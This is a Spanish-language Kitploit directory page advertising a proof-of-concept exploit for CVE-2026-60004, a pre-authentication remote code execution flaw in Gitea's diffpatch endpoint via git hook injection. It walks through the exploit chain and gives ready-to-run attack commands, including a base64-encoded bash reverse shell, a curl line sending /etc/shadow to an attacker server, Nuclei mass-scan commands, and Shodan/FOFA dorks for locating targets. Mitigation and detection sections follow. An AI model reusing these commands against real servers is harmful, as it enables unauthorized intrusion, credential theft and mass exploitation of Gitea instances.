Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-60004-POC — CVE-2026-60004 Exploit de RCE pre-autenticación — Gitea <= 1.27.0 inyección de gancho de git diffpatch (CVSS 9.8) | Kitploit
Herramientas/GitHubGitHub/imbas007/cve-2026-60004-poc
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubimbas007/cve-2026-60004-poc

CVE-2026-60004-POC

CVE-2026-60004 Exploit de RCE pre-autenticación — Gitea <= 1.27.0 inyección de gancho de git diffpatch (CVSS 9.8)

Ver Repositorio
1144hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-60004 — Ejecución Remota de Código Pre-Auth en Gitea (CVSS 9.8)

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  CVE-2026-60004  │  Gitea Pre-Auth RCE  │  CVSS 9.8 (CRIT)   │
│  diffpatch → git hook injection  │  v1.17–1.27.0 affected    │
└──────────────────────────────────────────────────────────────┘

📋 Resumen

AtributoDetalle
ID CVECVE-2026-60004
Puntuación CVSS9.8 (Crítico)
CWECWE-94 (Inyección de Código)
AfectadosGitea 1.17 hasta 1.27.0
Corregido enGitea 1.27.1 (publicado el 27 de julio de 2026)
Endpoint vulnerablePOST /api/v1/repos/{owner}/{repo}/diffpatch
Descubierto porShai Rod (NightRang3r)
Puntuación EPSS0.95 (95 % de probabilidad de explotación)

🔬 Detalles de la Vulnerabilidad

La vulnerabilidad abusa de cómo el endpoint diffpatch de la API de Gitea procesa parches Git proporcionados por el usuario:

  1. Trampa del clon bare — El endpoint crea un clon temporal bare (sin árbol de trabajo), lo que significa que su directorio raíz es $GIT_DIR.

  2. Procesamiento del parche — Se invoca git apply con las banderas: --index, --recount, --cached, --binary y (con Git ≥ 2.32) -3 para el respaldo de fusión de tres vías.

  3. Colisión add/add — Al enviar el mismo parche malicioso dos veces, el atacante provoca un conflicto add/add. El respaldo de fusión de tres vías de Git escribe en disco la ruta del archivo del parche, omitiendo la restricción de --cached.

  4. Inyección de hook — El atacante diseña el parche para que la ruta del archivo sea hooks/post-index-change. Como el clon es bare, esto acaba directamente en el directorio de hooks de Git.

  5. Ejecución de código — Cuando Git actualiza el índice, ejecuta automáticamente el hook post-index-change, ejecutando los comandos de shell del atacante como la .

Diagrama de la Cadena de Explotación

root@kitploit:~
Attacker                              Gitea Server
   │                                      │
   ├─ POST /user/sign_up ────────────────►│  Register new user
   │                                      │
   ├─ POST /api/v1/user/repos ───────────►│  Create private repo (auto-init)
   │                                      │
   ├─ GET /api/v1/repos/.../branches ────►│  Get commit SHA
   │                                      │
   ├─ POST /api/v1/repos/.../diffpatch ──►│  1st patch: plant hook
   │                                      │  Git creates bare clone
   │                                      │  Applies patch (--cached)
   │                                      │
   ├─ POST /api/v1/repos/.../diffpatch ──►│  2nd patch: SAME PATCH
   │   (same exact patch!)                │  ADD/ADD COLLISION!
   │                                      │  Git -3 fallback writes to disk
   │                                      │  hooks/post-index-change created
   │                                      │  Git fires post-index-change hook!
   │                                      │  ┌─ Command executes ─┐
   │                                      │  │ reads /etc/passwd  │
   │                                      │  │ stores in git blob │
   │                                      │  │ creates rce-proof  │
   │                                      │  │ branch             │
   │                                      │  └────────────────────┘
   │                                      │
   ├─ GET /api/v1/repos/.../raw/proof ───►│  Retrieve output
   │◄─────────────────────────────────────┤  /etc/passwd contents
   │                                      │

🚀 Inicio Rápido

PoC en Python (cve-2026-60004-poc.py)

root@kitploit:~
# Install dependencies (uses stdlib only — no pip needed!)
# Python 3.7+ required

# Quick one-liner
python3 cve-2026-60004-poc.py --url http://target --cmd "id"

# Mode 1: Full-Auto (register + create + exploit + retrieve)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto

# Mode 2: Semi-Auto (existing credentials)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode semi-auto \
    --user myuser --pw 'MyPass123!'

# Mode 3: Manual (existing user + repo)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode manual \
    --user myuser --pw 'MyPass123!' --repo existing-repo

# Mode 4: Check Only (non-intrusive detection)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode check
imagen

Comandos Personalizados

root@kitploit:~
# Execute custom command
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto \
    --cmd "whoami; id; env"

# Reverse shell (base64 encoded)
PAYLOAD=$(echo -n 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' | base64)
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto \
    --cmd "echo $PAYLOAD | base64 -d | bash"

# Exfiltrate data via curl
python3 cve-2026-60004-poc.py --url http://target:3000 --mode full-auto \
    --cmd "curl http://your-server/$(cat /etc/shadow | base64 -w0)"

Plantilla de Nuclei

root@kitploit:~
# Run against a single target
nuclei -t CVE-2026-60004.yaml -u http://target:3000

# Run against multiple targets
nuclei -t CVE-2026-60004.yaml -l targets.txt -o results.txt

# With debugging output
nuclei -t CVE-2026-60004.yaml -u http://target:3000 -debug -v

🛡️ Mitigación

Acciones Inmediatas

  1. Actualice Gitea a la versión 1.27.1 o posterior:

    root@kitploit:~
    # Docker
    docker pull gitea/gitea:1.27.1
    # Binary
    wget https://dl.gitea.com/gitea/1.27.1/gitea-1.27.1-linux-amd64
    
  2. Deshabilite el registro abierto (reduce la superficie de ataque):

    root@kitploit:~
    # app.ini
    [service]
    DISABLE_REGISTRATION = true
    
  3. Ejecute Gitea con una cuenta de servicio de privilegios mínimos

  4. Supervise las solicitudes POST repetidas al endpoint diffpatch

Consultas de Detección

root@kitploit:~
# Search for diffpatch abuse in Gitea logs
grep -E "POST.*diffpatch" /var/lib/gitea/log/gitea.log

# Check for suspicious repo creation + immediate diffpatch use
grep -E "(CreateRepository|diffpatch)" /var/lib/gitea/log/gitea.log

🔍 Dorks de Shodan / FOFA

root@kitploit:~
# Shodan
http.title:"Gitea"
http.favicon.hash:5247710

# FOFA
app="Gitea"
title="Gitea"

# Censys
services.software.product:"Gitea"

📚 Referencias

  • GitHub Security Advisory (GHSA-rcr6-4jqh-j84m)
  • Repositorio del PoC de EQSTLab
  • Entrada en NVD
  • Plantilla de Nuclei de ProjectDiscovery
  • Notas de la versión Gitea 1.27.1

⚠️ Descargo de Responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. Úsela únicamente contra sistemas que usted posea o para los que tenga permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal y puede violar:

  • Computer Fraud and Abuse Act (CFAA) — Estados Unidos
  • Computer Misuse Act 1990 — Reino Unido
  • Leyes similares en otras jurisdicciones

El autor no asume ninguna responsabilidad por el uso indebido o los daños causados por esta herramienta.

📄 Licencia

Licencia MIT — consulte el repositorio de EQSTLab para obtener más detalles.

Descargar herramienta
cuenta de servicio de Gitea